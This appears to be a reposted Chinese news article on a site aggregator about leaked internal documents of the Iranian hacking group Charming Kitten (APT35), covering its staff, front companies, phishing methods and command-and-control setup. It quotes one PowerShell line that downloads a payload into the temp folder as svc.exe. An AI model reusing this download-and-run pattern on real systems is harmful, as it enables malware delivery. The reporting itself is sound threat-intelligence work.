首页 游戏 软件 资讯 排行榜 专题
首页
科技数码
Mimicat组织数据泄露详情:核心成员、空壳公司与千台受控系统曝光

Mimicat组织数据泄露详情:核心成员、空壳公司与千台受控系统曝光

热心网友
92
转载
2025-12-15

安全研究员 Nariman Gharib 表示,泄露文件中的任务清单揭示,"迷人小猫"(Charming Kitten)的恶意软件主要瞄准外交、能源与民间社会组织网络。

据披露,以伊朗为背景的黑客组织"迷人小猫"(又称 APT35)近期泄露的内部文件,曝光了该组织核心成员、用于掩护的空壳公司以及遍布五大洲的数千台受控系统。

长期网络间谍行动体系

文件显示,隶属于伊朗伊斯兰革命卫队情报组织的第40部门,长期开展结合网络间谍、监控与目标定位的综合入侵行动。被盗的仪表盘数据和工资记录首次将具体黑客活动与实名操作人员关联,而不再是以往匿名的威胁标签。

泄露资料进一步揭示了支撑这些行动的财务体系,包括"姐妹团队"和"兄弟团队"的工资单,以及通过伪装成普通IT或云服务供应商的空壳公司流转的资金。受控系统涉及VPN网关、邮件服务器以及用于操纵已植入政府机构、高校和电信供应商内部的恶意软件的C2节点,完整呈现了资金流、管理链与恶意软件的三位一体运作模式。

攻击目标与感染途径

安全研究员 Nariman Gharib 指出,泄露材料中包含的任务清单表明,"迷人小猫"的恶意软件专门针对外交、能源和公民社会网络。攻击通常通过鱼叉式钓鱼邮件、伪造登录页面或伪装成会议邀请/工资单/政策文件的恶意文档附件传播。

当用户打开诱饵文件并启用脚本或输入凭证后,攻击者便获得初始立足点,最终实现设备完全控制与数据窃取。泄露的仪表盘日志显示,受害者主机的信标会通过HTTPS定期回连伊朗控制的服务器,这些通信往往隐藏在看似正常的网络流量中。

\

这些受控主机包括邮件网关、域控制器和用户笔记本电脑,使攻击者能访问邮件系统、文件共享和身份认证系统。泄露报告按地区和行业分类的感染机器集群,凸显了该行动的广泛影响。

感染机制与C2架构

感染通常始于用户打开宏或HTML诱饵后,在内存运行的小型加载器。简短的PowerShell命令会从固定但隐藏的URL获取主载荷,相关技术细节已在"迷人小猫"工具的完整分析报告中披露:

Invoke-WebRequest $u -OutFile "$env:TEMP\\\\svc.exe"

泄露日志显示,该二进制文件会作为计划任务持续运行,在伪装成正常Windows活动的同时维持稳定访问。

来源:https://www.51cto.com/article/831834.html
免责声明: 游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。

相关攻略

一种通用表格异常检测方法OFA-TAD实现多场景统一建模
AI资讯
一种通用表格异常检测方法OFA-TAD实现多场景统一建模

表格异常检测(Tabular Anomaly Detection, TAD),作为一项关键的数据分析技术,其核心使命在于从海量的结构化表格数据中,精准高效地识别出那些行为模式异常的“离群点”。无论是医疗健康领域的早期疾病预警指标,还是金融风控中隐秘的欺诈交易模式,都依赖于它的强大能力。然而,该技术在

热心网友
05.20
Anthropic发布网络安全AI模型应对代码泄露风险
AI资讯
Anthropic发布网络安全AI模型应对代码泄露风险

当地时间4月7日,人工智能领域迎来重要动态。知名AI公司Anthropic正式向亚马逊、苹果、微软等核心合作伙伴,推出了一款专为网络安全设计的AI模型——Claude Mythos Preview。 这款全新的网络安全AI模型目前处于预览阶段,并设定了严格的访问权限。据悉,Claude Mythos

热心网友
05.20
黄仁勋呼吁中美AI合作 称出口管制难阻中国算力发展
AI资讯
黄仁勋呼吁中美AI合作 称出口管制难阻中国算力发展

近日,英伟达(NVIDIA)联合创始人兼首席执行官黄仁勋就全球人工智能发展格局发表重要见解,他再次强调中美在AI领域加强合作与对话的紧迫性,其观点在科技与政策界引发深度讨论。 黄仁勋:呼吁中美AI研究对话与合作 北京时间4月16日,据彭博社等权威媒体报道,英伟达CEO黄仁勋在一次深度访谈中指出,由A

热心网友
05.19
NGINX CVE-2026-42945 漏洞被利用 可致进程崩溃与远程代码执行
业界动态
NGINX CVE-2026-42945 漏洞被利用 可致进程崩溃与远程代码执行

NGINX的CVE-2026-42945漏洞在披露后迅速遭野外利用,可导致工作进程崩溃,并在特定苛刻条件下可能引发远程代码执行。同时,openDCIM软件被曝存在三重漏洞链式利用,攻击者组合利用权限缺失、命令注入等漏洞,仅通过数次请求即可实现远程代码执行并控制服务器。相关补丁已发布,建议用户立即更新。

热心网友
05.19
大豪科技云服务器密码机与5G CPE安全网关实现批量出货
科技数码
大豪科技云服务器密码机与5G CPE安全网关实现批量出货

5月18日,大豪科技发布的投资者关系活动记录,揭示了其子公司兴汉网际的重要业务进展。记录明确指出,兴汉网际的业务布局深度覆盖网络安全硬件与云边端计算市场,其与中电信量子的战略合作,已深入至“量子安全”与“量子云服务”等前沿技术领域。 具体而言,兴汉网际依托其深厚的技术积累与完善的硬件产品矩阵,与中电

热心网友
05.18

最新APP

宝宝过生日
宝宝过生日
应用辅助 04-07
台球世界
台球世界
体育竞技 04-07
解绳子
解绳子
休闲益智 04-07
骑兵冲突
骑兵冲突
棋牌策略 04-07
三国真龙传
三国真龙传
角色扮演 04-07

热门推荐

星辰变归来灵兽战力排行榜 人气最高灵兽推荐
游戏资讯
星辰变归来灵兽战力排行榜 人气最高灵兽推荐

灵兽品阶决定成长上限,需按职业选择走兽、飞禽或鳞甲类。养成应与角色境界同步,集中资源优先培养主力至高星。技能分先天与后天,后天技能可动态调整应对战局。属性差异有限,后期培养深度更为关键。新手建议从中品起步,非重氪玩家以上品灵兽作为中期主力性价比更高。长期养成需分。

热心网友
05.20
马斯克捐款败诉 3800万慈善投资为何零回报
AI资讯
马斯克捐款败诉 3800万慈善投资为何零回报

马斯克起诉OpenAI违背非营利使命一案因超过诉讼时效被法院驳回。马斯克原承诺出资10亿美元实际仅投入3800万美元,后因控制权之争离开。此后OpenAI转型营利并估值飙升,本案虽凸显非营利初心与资本扩张的冲突,但法庭未就实质问题作出裁决。

热心网友
05.20
风起官渡新版本天下归心预约开启
游戏资讯
风起官渡新版本天下归心预约开启

《天下归心》新版本“风起官渡”开启预约。鲁肃、孟获两位新名将登场,其技能将改变阵容搭配逻辑。跨服官渡之战复刻历史多阶段阵营对抗,重现史诗战场。新增藏品阁系统,陈列藏品可提升全队战力。士兵系统革新,装配军旗与令箭可释放觉醒技能,深化战术策略。预约即可领取专属礼包。

热心网友
05.20
魏牌V9X正式上市:魏建军诠释豪华新标准,以信赖铸就未来
AI资讯
魏牌V9X正式上市:魏建军诠释豪华新标准,以信赖铸就未来

长城汽车创始人魏建军以“怕”为引,强调敬畏造车规律、珍视用户信任。面对行业内卷与营销泡沫,长城坚持长期主义,投入巨资研发并延长验证周期,以归元平台及魏牌V9X展现技术实力与品质承诺。通过将个人声誉与品牌绑定,长城构建以信任为核心的持久竞争力,其探索对行业良性发展具有重。

热心网友
05.20
深蓝S05与皓瀚DH-i混动技术对比哪款更值得入手
AI资讯
深蓝S05与皓瀚DH-i混动技术对比哪款更值得入手

深蓝S05轴距达2880毫米,搭载AI大模型与L2+级智驾,注重科技体验与纯电性能。皓瀚DH-i轴距2775毫米,配备L2级辅助驾驶与实用智能座舱,强调经济可靠与混动平衡。两者分别吸引追求前沿科技的年轻群体和重视实用性的家庭用户,体现了新能源市场技术路线多元化并存的趋势。

热心网友
05.20